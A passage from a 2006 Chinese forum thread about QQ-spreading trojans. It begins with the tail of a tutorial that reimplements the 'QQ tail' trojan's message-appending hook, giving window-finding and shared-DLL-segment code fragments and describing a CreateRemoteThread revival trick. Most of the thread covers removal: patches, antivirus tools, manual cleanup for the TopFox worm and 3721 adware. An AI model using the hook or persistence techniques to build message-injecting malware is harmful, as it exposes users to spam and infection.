  到此为止,以上所有的代码都位于一个Hook.dll的动态链接库之中,关于DLL我就不多介绍了,请查阅MSDN上的相关资料和本文的配套源代码。
  DLL之中已经做好了所有重要的工作(事实上这部分工作也只能由DLL来完成,这是由Windows虚拟内存机制决定的),我们只需要在EXE之中调用导出的SetHook函数就可以了。那么,SetHook的参数如何获得呢?请看以下代码:
// 感谢好友hottey的查找代码,省去了我使用Spy++的麻烦
HWND hSend;
g_hQQ = NULL;
SetHook(NULL);
do
{
[$nbsp][$nbsp]g_hQQ = FindWindowEx(NULL, g_hQQ, "#32770", NULL);
[$nbsp][$nbsp]hSend = FindWindowEx(g_hQQ, NULL, "Button", "发送([$S)"]
} while(g_hQQ != NULL [$& hSend == NULL)]
if (g_hQQ != NULL)
[$nbsp][$nbsp]SetHook(g_hQQ);
  这段代码中的do-while循环就是用来查找“发送消息”的窗口的,QQ窗口的保密性越来越强了,窗口一层套一层,找起来十分不便,所以在此感谢好友hottey的《QQ消息炸弹随想》一文省去了我反复使用Spy++的麻烦。我所做的,只是把他文中的Delphi代码翻译成了C代码。

DLL的共享数据段

  如果你对DLL不甚了解,那么在你读到我的配套源代码之后,肯定会对下面这一段代码有些疑问:
// 定义共享数据段
#pragma data_seg("shared"
HHOOK g_hProc = NULL; // 窗口过程钩子句柄
HHOOK g_hKey = NULL; // 键盘钩子句柄
HWND g_hRich = NULL; // 文本框句柄
#pragma data_seg()
#pragma comment(linker, "/section:shared,rws"
  这定义了一段共享的数据段,是的,因为我的注释已经写得很清楚了,那么共享数据段起到了什么作用呢?在回答这个问题之前,我请你把代码中以#开头的预处理指令注释掉然后重新编译这个DLL并运行,你会发现什么?
  是的,添加尾巴失败!
  好了,我来解释一下这个问题。我们的这个仿真程序的EXE、DLL以及QQ的主程序事实上是下面这样一种关系:

  这个DLL需要将一个实例映射到EXE的地址空间之中以供其调用,还需要将另一个实例映射到QQ的地址空间之中来完成挂接钩子的工作。也就是说,当钩子挂接完毕之后,整个系统的模块中,有两个DLL实例的存在!此DLL非彼DLL也,所以它们之间是没有任何联系的。拿全局变量g_hRich来说,图中左边的DLL通过EXE的传入获得了文本框的句柄,然而如果没有共享段的话,那么右边的DLL中,g_hRich仍然是NULL。共享段于此的意义也就体现出来了,就是为了保证EXE、DLL、QQ三者之间的联系。这一点,和C++中static的成员变量有些相似。
  在钩子挂接成功之后,你可以通过一些有模块查看功能的进程管理器看一看,就会发现Hook.dll也位于QQ.exe的模块之中。

最后一些要说的

  1、我是前说过,在2003年的1月份我就碰到了这种病毒,至今我还很清楚地记得那个病毒EXE只有16KB大小,所以从病毒本身存在的性质来说,这个东西应该是用Win32ASM来写会更实用一些。
  2、那个病毒我曾经是手杀的——用了一个进程查看工具就杀掉了。但是现在的“QQ尾巴”增加了复活功能——在EXE被杀掉后,DLL会将其唤醒。我曾经用我的进程查看工具分析过,发现系统中几乎所有的进程都被病毒的DLL挂住了。这一技术是利用CreateRemoteThread在所有的进程上各插入了一个额外的复活线程,真可谓是一石二鸟——保证EXE永远运行,同时这个正在使用中的DLL是无法被删除的。这一技术我也已经实现了,但是稳定性方面远不及病毒本身做得优秀,故在此也就不将其写出了,有兴趣的朋友可以参考Jeffrey Richter《Windows核心编程》的相关章节。

第二、该病毒的主要特征:

  这种病毒并不是利用QQ本身的漏洞 进行传播。它其实是在某个网站首页上嵌入了一段恶意代码,利用IE的iFrame系统漏洞自动运行恶意木马程序,从而达到侵入用户系统,进而借助QQ进行垃圾信息发送的目的。用户系统如果没安装漏洞补丁或没把IE升级到最高版本,那么访问这些网站的时候其访问的网页中嵌入的恶意代码即被运行,就会紧接着通过IE的漏洞运行一个木马程序进驻用户机器。然后在用户使用QQ向好友发送信息的时候,该木马程序会自动在发送的消息末尾插入一段广告词,通常都是以下几句中的一种。

  QQ收到信息如下:

  1. HoHo~~ http://www.mm**.com刚才朋友给我发来的这个东东。你不看看就后悔哦,嘿嘿。也给你的朋友吧。

  2. 呵呵,其实我觉得这个网站真的不错,你看看http://www.ktv***.com/

  3. 想不想来点摇滚粗口舞曲,中华 DJ 第一站,网址告诉你http://www.qq33**.com.。不要告诉别人 ~ 哈哈,真正算得上是国内最棒的 DJ 站点。

  4. http//www.hao***.com 帮忙看看这个网站打不打的开。

  5. http://ni***.126.com 看看啊. 我最近照的照片~ 才扫描到网上的。看看我是不是变了样?


如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

免费广告位,欢迎刊登  回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  13楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-17 20:39:18 [显示全部帖子]

二、解决方法:

  1.在运行中输入MSconfig,如果启动项中有“Sendmess.exe”和“wwwo.exe”这两个选项,将其禁止。在C:\WINDOWS一个叫qq32.INI的文件,文件里面是附在QQ后的那几句广告词,将其删除。转到DOS下再将“Sendmess.exe”和“wwwo.exe”这两个文件删除。

  2.随时升级杀毒软件
http://qqdl.tencent.com/duba_qqmsg.exe

3.安装系统漏洞补丁

  由病毒的播方式我们知道,“QQ尾巴”这种木马病毒是利用IE的iFrame传播的,即使不执行病毒文件,病毒依然可以借由漏洞自动执行,达到感染的目的。因此应该敢快下载IE的iFrame漏洞补丁。

  iFrame漏洞补丁地址:

Internet Explorer 6.0
[$nbsp][$nbsp]Security Update
2.41 MB file
12 min @ 28.8 Kbps

http://download.microsoft.com/do ... MeXP/CN/q319182.exe

nternet Explorer 5.5 SP2
Security Update
2.12 MB file
10 min @ 28.8 Kbps

http://download.microsoft.com/do ... 98Me/CN/q319182.exe

Internet Explorer 5.5 SP1
Security Update
2.47 MB file
12 min @ 28.8 Kbps

http://download.microsoft.com/do ... 98Me/CN/q319182.exe

Internet Explorer 5.01 SP2 for Windows NT and Windows 2000
Security Update
1.88 MB file
9 min @ 28.8 Kbps

http://download.microsoft.com/do ... KNT4/CN/q319182.exe

在线杀毒: http://club.qq.com/virus/killqqvirus.htm

QQ病毒瑞星专杀工具(离线版)

http://download.rising.com.cn/zsgj/RavQQMsender.exe

腾讯公司提供的金山专杀工具
http://download.duba.net/download/othertools/Duba_qqmsg.EXE

腾讯公司提供的瑞星专杀工具
http://download.rising.com.cn/zsgj/RavQQMsender.exe

瑞星专用杀毒工具下载 >> “QQ病毒”专杀工具--------推荐!!!


工具名称:RavQQMsender.exe
版 本 号:3.0
软件大小:117 KB

http://download.rising.com.cn/zsgj/RavQQMsender.exe

应用平台:Windows平台
更新时间:2004-06-11
发布时间:2003-09-27
发布公司:北京瑞星科技股份有限公司

软件说明
[$nbsp][$nbsp]
[$nbsp][$nbsp]2004年06月11日3.0版增加了QQMsender病毒变种:Trojan.QQinfor,
Flooder.QQSender.b,HackTool.QQCrack,Trojan.PSW.QQpass.bh,
Trojan.PSW.QQpass.bi,Trojan.PSW.QQpass.bj,Trojan.QQ3344.bl.enc,
Trojan.QQ3344.bn.enc,Trojan.QQ3344.bo.enc,Trojan.QQ3344.bq.enc,
Trojan.QQMsg.C361,Trojan.QQMsg.Chujingchun.enc,
Trojan.QQPSW.g.enc,Trojan.QQPSW.h,Trojan.QQPSW.h.dll,
Trojan.qqsender.c,Trojan.QQSender.d,TrojanClick.book.f.enc,
Trojan.QQbot.a.enc,Trojan.QQbot.a.enc,Trojan.PSW.QQpass.bk.enc,
Trojan.PSW.QQpass.bk.Mak.enc,Trojan.QQbot.a.Client.enc,
TrojanDownloader.QQWb.enc,Flooder.QQMsg.Qfz.enc,
Flooder.QQMsg.QQAttack.b.enc,HackTool.DDoS.QQBomb,
Trojan.PSW.QQpass.ak.b,Trojan.PSW.QQpass.ak.c,
Trojan.PSW.QQpass.bk.enc,Trojan.PSW.QQPass.bk.Maker.enc,
Trojan.QQ3344.br.enc,Trojan.QQ3344.bs.enc,
Trojan.QQ3344.bt.enc,Trojan.QQ3344.bu.enc,
Trojan.QQ3344.StartPage.enc,Trojan.QQBot.b.Maker.enc,
Trojan.QQMSG.Boker.i.enc,Trojan.QQMSG.Boker.j.enc,
Trojan.QQMsg.C361.b,Trojan.QQMsg.C361.b.Hook,
Trojan.QQMsg.g.enc,Trojan.QQMsg.WhBoy.v.enc,
TrojanDownload.QQWB.enc,Trojan.QQBot.b.enc,
Trojan.QQBot.b.enc,Trojan.QQBot.b.enc
2004年05月17日2.9版增加了QQMsender病毒变种:HackTool.QQControl.10.enc,
Trojan.PSW.QQFinder,Trojan.QQ.ForceVideo.Mak.enc,
Trojan.QQ3344.bm.enc,Trojan.QQMSG.Boker.f.enc,
Trojan.QQMSG.Boker.g.enc,Trojan.QQMSG.Boker.h.enc,
Trojan.QQMsg.QQSB,Trojan.QQMsg.WhBoy.u.enc,
Trojan.QQPSW.EasyGet.j.enc,Trojan.QQPSW.EasyGet.j.Mak.enc,
Trojan.QQPSW.EasyGet.k.enc,Trojan.QQPSW.EasyGet.l.enc,
Trojan.QQPSW.EasyGet.l.Mak.enc,Trojan.QQPSW.f.Mak.enc,
Trojan.QQSpy.21.Client.enc,Trojan.QQSpy.21.Server.enc,
TrojanClick.book.c.enc,TrojanClick.book.d.enc,
TrojanClick.book.e.enc。
2004年04月26日2.8版增加了QQMsender病毒变种:Trojan.QQPass.at.enc,
Trojan.PSW.GetQQPass.enc,Trojan.PSW.QQPass.bg,
Trojan.QQ3344.aq.enc,Trojan.QQ3344.bi.enc,
Trojan.QQ3344.bj.enc,Trojan.QQ3344.bk.enc,
Trojan.QQ3344.bk.ocx,Trojan.QQMSG.Boker.d.enc,
Trojan.PSW.GetQQPass.Dll ,Trojan.QQMSG.Boker.e。
2004年04月13日2.7版增加了QQMsender病毒变种:TrojanClick.book,

Flooder.QQSender.enc,HackTool.QQList20.enc,Trojan.FakeQQ.d,

Trojan.PSW.FakeQQ,Trojan.PSW.leunn, Trojan.PSW.LMir.eb,Trojan.PSW.QQDragon.sa,

Trojan.PSW.QQGet.033,Trojan.PSW.QQjipin.enc,

Trojan.PSW.QQjipin.maker.enc,Trojan.PSW.QQpass.ak.a.enc,

Trojan.PSW.QQPass.au.enc,Trojan.PSW.QQpass.az,

Trojan.PSW.QQpass.be.enc,Trojan.PSW.QQpass.bf,

Trojan.PSW.QQpass.bf.maker.enc,Trojan.qq3344.ay.enc,

Trojan.qq3344.az.enc,Trojan.QQ3344.b.enc, Trojan.QQ3344.ba.enc,Trojan.QQ3344.bb.enc,

Trojan.QQ3344.bc.enc,Trojan.QQ3344.bd.enc, Trojan.QQ3344.be.enc,Trojan.QQ3344.bf.enc,

Trojan.QQ3344.bg.enc,Trojan.QQ3344.bh.enc,

Trojan.QQMSG.Boker.a.enc,Trojan.QQMSG.Boker.b.enc,

Trojan.QQMSG.Boker.c.enc,Trojan.QQMsg.WhBoy.mm,

Trojan.QQMsg.WhBoy.s.enc,Trojan.QQMsg.WhBoy.t,

Trojan.QqPsw.EasyGet.h,Trojan.QQPSW.EasyGet.i.enc,

Trojan.QQPSW.f.enc,Trojan.QQSpy.20.Client, Trojan.QQSpy.20.server,TrojanDropper.QQMsender.i

.
2004年03月23日2.6版增加了QQMsender病毒变种:Trojan.PSW.whboy.w,

Hacktool.QQcell.20,Trojan.ClientQQS,Trojan.LMir.WhBoy.d,

Trojan.LMir.WhBoy.da.enc,Trojan.LMir.WhBoy.e, Trojan.LMir.WhBoy.f,Trojan.LMir.WhBoy.g.enc,

Trojan.LMir.WhBoy.g.hook,Trojan.LMir.WhBoy.i.enc,

Trojan.LMir.WhBoy.j.Maker.enc,Trojan.Lmir.WhBoy.k.enc,

Trojan.PSW.QQPass.7.enc,Trojan.PSW.QQPass.ar.enc,

Trojan.PSW.QQPass.as.enc,Trojan.PSW.QQPass.as.maker.enc,

Trojan.PSW.whboy.q.enc,Trojan.PSW.whboy.r.enc,
Trojan.PSW.whboy.s.enc,Trojan.PSW.whboy.t.enc,
Trojan.PSW.whboy.u.enc,Trojan.PSW.WHboy.v.enc,
Trojan.QQ3344.at.enc,Trojan.QQ3344.au.enc,Trojan.QQ3344.av.enc,
Trojan.QQ3344.aw.enc,Trojan.qq3344.ax.enc,Trojan.QQMsg.WhBoy.f,
Trojan.QQSend.maker.enc,Trojan.QQspy.e.Client.enc,
Trojan.QQspy.e.Setup,Trojan.QQTail.i.Maker.enc,
Trojan.WhBoy.i.enc,Trojan.WhBoy.k,Trojan.WhBoy.m.enc,
TrojanDropper.QQPass.b,Worm.LovGate.v.QQ,Trojan.QQspy.e.enc,
Trojan.QQspy.e.enc,Trojan.QQSend,Trojan.QQSend,
Trojan.LMir.WhBoy.j.enc,Trojan.LMir.WhBoy.j.enc.
2004年03月03日2.5版增加了QQMsender病毒变种:Trojan.Legend.Syspoet.f, Trojan.QQ3344.ar,

Trojan.QQ3344.ap, Trojan.QQ3344.as.
2.4版增加了QQMsender病毒变种:Trojan.Legend.Syspoet.c,
Trojan.Legend.Syspoet.d, Trojan.Legend.Syspoet.e,Trojan.QQ3344.ao,
Trojan.QQMsg.WhBoy.
2.3版增加了“美女杀手”QQMsender病毒变种:Trojan.Legend.Syspoet.b 详情>>
2.2版增加了QQMsender病毒变种:Trojan.Legend.Syspoet.enc,Trojan.PSW.QQpass.ag
Trojan.QQkiller.ib, Trojan.QQMsg.WhBoy.p.enc
2.1版增加“牛角尖木马”等QQMsender病毒变种:Trojan.PSW.QQpass.af ,Trojan.QQMsg.WhBoy.o.enc,

Trojan.PSW.QQImitation, Trojan.PSW.QQpass.af,Trojan.QQ3344.an.enc

,Trojan.QQMsg.WhBoy.o.enc,Trojan.QQPSW.e,
Trojan.QQPswReport.dll,Trojan.QQPswReport.enc
2.0版增加了QQMsender病毒变种:Trojan.QQPSW.EasyGet.EdtSrv.d,Trojan.PSW.QQpass.al.enc,

Trojan.PSW.QQPass.bd,Trojan.PSW.QQSearch.enc,
Trojan.PSW.QQSearch.hook,Trojan.PSW.QQSearch.make,

Trojan.PSW.QQSearch.setup,Trojan.QQMsg.Tskmg.enc,

Trojan.QQMsg.WhBoy.m.enc,Trojan.QQMsg.WhBoy.n.enc,

Trojan.QQPass.Look.enc,Trojan.QQPSW.EasyGet.g
1.9版增加了QQMsender病毒变种:Trojan.QQpass7.c, Trojan.QQpass7.c.setup,

Trojan.QQpass7.d.enc, Trojan.PSW.QQPass.b.enc, Trojan.PSW.QQPass.bb.enc,

Trojan.PSW.QQPass.bc.enc, Trojan.PSW.QQPass.bb.make.enc, Trojan.PSW.QQPass.bc.make.enc,

Trojan.QQMsg.WhBoy.i.enc, Trojan.PSW.QQPass.enc, Trojan.QQMsg.WhBoy.l.enc,

Trojan.QQMsg.WhBoy.k.enc, Trojan.QQMsg.WhBoy.g, Hack.QQpassCr.enc,
1.8版增加了QQMsender病毒变种:Constructor.QQMsender.b.enc, Trojan.LMir.WhBoy.b,

Trojan.PSW.QQPass.7003.dll.enc, Trojan.PSW.QQpass.ab, Trojan.PSW.QQpass.ac,

Trojan.PSW.QQpass.ae.enc, Trojan.QQ3344.al.enc, Trojan.QQ3344.am.enc,

Trojan.QQMsender.LovSea.l, Trojan.QQMsg.WhBoy.e.enc, Trojan.QQMsg.WhBoy.f.enc,

Trojan.QQMsg.WhBoy.g.enc, Trojan.QQMsg.WhBoy.h.enc, Trojan.QQPSW.EasyGet.EdtSrv.c,

Trojan.QQPSW.EasyGet.f,
1.7版增加了QQMsender病毒变种:Trojan.PSW.QQPass.aj,Trojan.QQPSW.EasyGet.e.enc,
Trojan.QQPSW.EasyGet.e, Trojan.QQSender.n,Trojan.QQpass7.b.enc
1.6版增加了QQMsender病毒变种:Trojan.QQ3344.ak.enc, Trojan.PSW.QQPass.aq,

TrojanDropper.QQpass7001, Trojan.PSW.QQpass.ak.enc, Trojan.LMir.WhBoy.c,

Trojan.PSW.QQPass.ai, Trojan.QQ3344.al, Trojan.PSW.QQpass7001, Trojan.QQPass7001.binder,

Trojan.QQpass7001.Set, Trojan.QQPass7001, Trojan.QQpass7001.b, Trojan.QQKiller.2003,

Trojan.QQPSW.d, TrojanDropper.QQpass7001.b, Trojan.PSW.GetQQPassWord.32.
1.5版增加了QQMsender病毒变种:Trojan.QQpass.8736.enc, Trojan.QQPSW.c.dll,

Trojan.QQPSW.c.Cfg, Trojan.QQPSW.c, Trojan.PSW.QQthief.b, Trojan.QQPSW.EasyGet.d,

Trojan.QQ3344.aj, Trojan.PSW.QQmsgaogo.enc, Trojan.QQPSW.EasyGet.EdtSrv.b,

Trojan.QQMsender.LovSea.j.Cfg.enc, TrojanDropper.QQMSender.b, Trojan.QQPSW.EasyGet.c,

Trojan.QQPSW.b.enc, TrojanDropper.QQKiller, Trojan.QQPSW.EasyGet.a, Trojan.QQPSW.EasyGet.b
1.4版增加了QQMsender病毒变种:Trojan.QQprank,Trojan.QQPSW.Stealer.EasyGet, Trojan.QQspy.d,

Trojan.FakeQQ.b, Trojan.FakeQQ.c, Trojan.QQMsender.LovSea.i.enc, Trojan.PSW.Cqq.1.0.enc,

Trojan.QQMsender.LovSea.j.enc, Trojan.PSW.QQSpy7005.config.enc, Trojan.QQ3344.ah.enc,

Trojan.DRAGONQQ.128, Trojan.leo-QQ.b.enc, Trojan.QQTail.Hook, Trojan.PSW.Cqq.1.0.dll,

Trojan.QQtail.b.enc, Trojan.QQtail.b.dll, Trojan.PSW.QQSpy7005.b.encTrojanDropper.FakeQQ,

Trojan.QQPSW.Stealer.Bakand, Trojan.leo-QQ, Trojan.QQMsg.WhBoy.c.enc,

Trojan.QQMsg.WhBoy.d.enc, Trojan.QQ3344.ai.enc, Trojan.QQTail.Maker.enc,

Trojan.QQspy.d.Client, Trojan.QQPSW.Stealer.EasyGet.EdtSrv,

Trojan.QQPSW.Stealer.EasyGet.EdtSrv2, Trojan.QQHacker4.enc, Trojan.WatchQQ.b,

Trojan.PSW.QQSpy7005.b.config.enc, Trojan.QQ.mdover14, Trojan.Clicker.WebAuto.g,

Trojan.QQMsender.LovSea.c.enc, Trojan.QQMsender.LovSea.d.enc, Trojan.QQMsender.LovSea.g.enc,

Trojan.QQMsender.LovSea.h.enc, Trojan.QQMsender.LovSea.i.enc, Trojan.QQMsender.Rocket.enc,

Trojan.Clicker.WebAuto, Trojan.QQ3344.t, Trojan.QQMsg.WhBoy.b.enc, Trojan.QQmsender.Linmm,

Trojan.QQMsender.LovSea.b.enc, Trojan.Clicker.WebAuto.h, Trojan.Clicker.WebAuto.c,

Trojan.Clicker.WebAuto.d, Trojan.Dj3344, Trojan.WebAuto.Download, Trojan.QQ3344.i.enc,

Trojan.QQ3344.i.enc, Trojan.QQ3344.ab.enc, Trojan.QQMsender.i.enc, Trojan.QQMsender.i.enc,

Trojan.QQ3344.ac.enc, Trojan.QQ3344.ra.enc, Trojan.QQ3344.rb.enc, Trojan.QQ3344.1.enc,

Trojan.QQ3344.y.enc, Trojan.QQ3344.4.enc, Trojan.QQ3344.ae.enc, Trojan.QQ3344.2.enc,

Trojan.QQ3344.3.enc, Trojan.QQ3344.z.enc, Trojan.QQ3344.ag.enc, Trojan.QQ3344.ad.enc,

Trojan.QQ3344.af.enc, Trojan.QQMsender.j.enc, Trojan.QQMsender.LovSea.k,

Trojan.QQMsender.i.Cfg.enc, Trojan.QQMsender.LovSea.j.Cfg.encTrojanDropper.QQMsender,

Trojan.QQMsender.LovSea.i.enc, Trojan.QQMsender.h.enc, Trojan.QQ3344.g, Trojan.QQ3344.i.enc,

Trojan.QQMsender.enc, Trojan.QQ3344.rc.enc, Trojan.QQMsender.LovSea.i.dll, Trojan.WebAuto.f,

Trojan.QQ3344, Trojan.QQMsender.LovSea.j.enc, Trojan.QQ3344.w.enc, Trojan.QQ3344.u,

Trojan.WebAuto, Trojan.WebAuto.a, Trojan.WebAuto.b, Trojan.WebAuto.c.enc, Trojan.WebAuto.d,

Trojan.WebAuto.e, Trojan.Clicker.WebAuto.e, Trojan.WebAuto.g, Trojan.QQMsender.LovSea.d.enc,

Trojan.Clicker.WebAuto.b.enc, Trojan.QQMsender.k.enc, Trojan.QQMsender.TN02.enc,

Trojan.Film3344.enc, Trojan.QQ3344.a.enc, Trojan.QQ3344.d, Trojan.QQ3344.e.enc,

Trojan.QQ3344.f.enc, Trojan.QQ3344.h.enc, Trojan.Clicker.WebAuto.f,

Trojan.PSW.QQpass.ah.enc, Trojan.QQ3344.j.enc, Trojan.QQ3344.l.enc, Trojan.QQ3344.m.enc,

Trojan.QQ3344.n.enc, Trojan.QQ3344.o.enc, Trojan.QQ3344.p.enc, Trojan.QQ3344.r.enc,

Trojan.QQ3344.S.enc, Trojan.QQDJ3344.b.enc, Trojan.QQDJ3344.c.enc, Trojan.QQMsender.a.enc,

Trojan.QQMsender.b, Trojan.QQMsender.c.enc, Trojan.QQMsender.d.enc, Trojan.QQMsender.e.enc,

Trojan.QQMsender.f.enc, Trojan.QQMsender.g.enc, Trojan.QQMsender.k.enc, Trojan.QQ3344.v.enc,

Junk.QQMsender, Constructor.QQMsender.b, Constructor.QQMsender.a.enc
1.3版增加了QQMsender病毒变种:Constructor.QQMsender.b, Sript.QQMsender.g,
Trojan.QQ3344.2, Trojan.QQ3344.3, Trojan.QQ3344.4, Trojan.QQ3344.Z,
Trojan.QQ3344.l, Trojan.QQ3344.ab, Trojan.QQ3344.ac, Trojan.QQ3344.ad, Trojan.QQ3344.ae,

Trojan.QQ3344.af, Trojan.QQ3344.ag, Trojan.QQ3344.ra, Trojan.QQ3344.rb, Trojan.QQ3344.rc,

Trojan.QQ3344.S, Trojan.QQ3344.y, Trojan.QQ3344.z, Trojan.QQMsender.i.Cfg.enc,

Trojan.QQMsender.i.Cfg.enc, Trojan.QQMsender.i.enc, Trojan.QQMsender.i.enc,

Trojan.QQMsender.LovSea.j.Cfg.enc, Trojan.QQMsender.LovSea.k, TrojanDropper.Qqmsender.
1.2版增加了QQMsender病毒变种:Trojan.QQ3344.v,Trojan.QQ3344.u,

Trojan.QQMsender.LovSea.j.enc, Trojan.QQ3344.w, Trojan.QQMsender.h, Trojan.QQ3344.t,

Trojan.QQMsender.LovSea.i.dll
1.1版增加了QQMsender病毒变种:Trojan.QQMsender.Linmm
专杀QQ病毒家族的专杀工具。下载工具后直接运行即可。
目前可以查杀Trojan.QQ3344,Trojan.QQMsender,Trojan.WebAuto三大病毒家族的100余个QQ类病毒。

江民科技提供的免费试用十天的QQ专杀工具

http://update.jiangmin.com/download/kv2004.exe

另外还要小心“QQ密码结巴”病毒

病毒信息:江民公布“QQ密码结巴”病毒技术分析


如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

论坛上回帖的意义和技巧(严重潜水者坚决清除)  回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  14楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-17 20:40:51 [显示全部帖子]

狐狸王(Worm.OICQ.TopFox)手工清除方法

病毒名称:狐狸王(Worm.OICQ.TopFox)
病毒类型:通过QQ传播的蠕虫病毒
病毒危害级别:★★★☆
病毒发作现象及危害:病毒运行后会向用户的QQ好友自动发送名为“介绍个新疆MM给你认识.jpg.exe”等的病毒文件,其他用户打开这些文件就会被病毒感染。它会造成用户计算机上的一些常用软件无法正常运行,并且会盗取用户的网上银行、QQ的账号和密码。病毒采用具有诱惑性的图标,初次运行后弹出一个虚假的提示使用户对其放松警惕。



手工删除:

一、清除内存中的病毒

1、由于该病毒禁用了系统任务管理器,我们可以使用第三方的进程管理软件(如:Prcview等)进行操作。在进程列表中找到名为“wmimgr.exe”和“comime.exe”项,结束它们。

2、如果用户使用的是WindowsXP系统,可以运行“ntsd –c q –pn wmimgr.exe”和“ntsd –c q –pn comime.exe”结束病毒的进程。

二、删除病毒文件

1、在“我的电脑”中进行设置,显示所有的隐藏文件和系统文件。

2、删除掉系统目录下的“wmimgr.exe”、“DHelp.dll”、“comime.exe”和“msinthk.dll”几个文件。

3、删除掉Windows目录及下面wbem目录中的“DHelp.dll”文件。

4、删除掉QQ目录及下面QQ游戏目录(QQGame)中的“QQDHelp.dll”文件。

5、删除掉Local Setting\temp下面的“~!KqVo4c.exe”和“~H32Jvk.jpg”文件。

三、恢复被病毒禁用的系统功能

1、由于该病毒禁用了注册表编辑器,因此要先解除限制。运行“gpedit.msc”打开组策略编辑器,找到“用户配置-》管理模板-》系统”,找到“阻止访问注册表编辑器”打开,选择“已禁用”并确定,即可解除注册表编辑器的限制。

2、在“组策略编辑器”中找到“用户配置-》管理模板-》系统-》Ctrl+Alt+Del选项”,找到“删除‘任务管理器’”打开,选择“已禁用”并确定,即可解除任务管理器的限制。

四、修复病毒修改的注册表项目

打开注册表编辑器,删除掉“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下面的“mssysint”和“Windows Management Instrumentation”两项。

五、修复被病毒破坏的文件

1、从操作系统安装盘的I386目录下找到“explorer.ex_”、“notepad.ex_”和“iexplore.ex_”文件,如果操作系统安装过Service Pack,则解压缩相应的SP,从它的I386目录下复制这些文件。

2、使用expand命令提取上述文件。如:“expand explorer.ex_ explorer.exe”。

3、将提取出的这些文件复制到系统目录下的dllcache目录中,默认为“C:\Windows\system32\dllcache”

4、将“explorer.exe”、“notepad.exe”复制到Windows目录下,默认为“C:\Windows”。将“iexplore.exe”复制到IE的目录下,默认为“C:\Program Files\Internet Explorer”。

5、重新安装QQ。


如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

 回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  15楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-17 20:42:44 [显示全部帖子]

3721彻底清除方法

在安全模式下

打开注册表编辑器。展开注册表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
在右侧窗口中删除CnsMin键。

 还是在安全模式下面

展开注册表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\AdvancedOptions
删除整个!CNS目录,这个目录在“Internet选项-高级”中加入了3721网络实名的选项;

展开注册表到
HKEY_LOCAL_MACHINE\SOFTWARE\3721]以及[HKEY_CURRENT_USER\Software\3721
删除整个3721目录;

展开注册表到
HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main
删除CNSEnable等几个以CNS开头的键。

  在删除完注册表中的项之后,还需要删除存储在硬盘中的3721网络实名文件,海豚在这里给楼主介绍一个比较快捷的方法,是:打开“开始”菜单,点击【查找-文件或文件夹】,分三次在“名称”中输入3721、CnsMin、cnsio分别查找,然后把找到的文件全部删除。



如您对网站有任何疑问请QQ:93612738,或联系服务

电话:13937851927,感谢您的关注!

@开封论坛:http://www.izhen.cn/,欢迎大家一起来建设!

论坛上回帖的意义和技巧(严重潜水者坚决清除)  回到顶部
帅哥哟,离线,有人找我吗?
追梦无极限
  16楼 | QQ | 信息 | 搜索 | 邮箱 | 主页 | UC


加好友 发短信 一直在用心
等级:管理员 帖子:9672 积分:69820 威望:21 精华:39 注册:2005-06-29 12:56:56
  发帖心情 Post By:2006-08-17 20:43:27 [显示全部帖子]

问:但是system32\drivers\cnsminkp.sys删除不了,删完一刷新或重新搜索又出来了,怎么办?
答:先把windows\system32\drivers目录复制一份,取名为drivers1,并将其中的CnsMinKP.sys删除(注意,因为是drivers1中的,所以可以被成功地真正删除掉);

重新启动机器,到安全模式下

用drivers1目录替代原来的drviers目录

cd windows\system
ren drivers drivers2
ren drivers1 drivers

之后重新启动机器,然后进到windows后先把drivers2目录删除了,然后慢慢收拾残余文件和清理注册表。在这里,海豚提供一个reg文件,方便您尽可能干净的删除注册表:

Windows Registry Editor Version 5.00(用98的把这行改成regeidt4)

[-HKEY_LOCAL_MACHINE\SOFTWARE\3721]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{
B83FC273-3522-4CC6-92EC-75CC86678DA4 }]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{
D157330A-9EF3-49F8-9A67-4141AC41ADD4 }]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CnsHelper.CH]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CnsHelper.CH.1]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CnsMinHK.CnsHook]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CnsMinHK.CnsHook.1]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{
1BB0ABBE-2D95-4847-B9D8-6F90DE3714C1 }]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{
A5ADEAE7-A8B4-4F94-9128-BF8D8DB5E927 }]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{
AAB6BCE3-1DF6-4930-9B14-9CA79DC8C267 }]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\AdvancedOptions\!CNS]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{
00000000-0000-0001-0001-596BAEDD1289 }]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CnsMin]
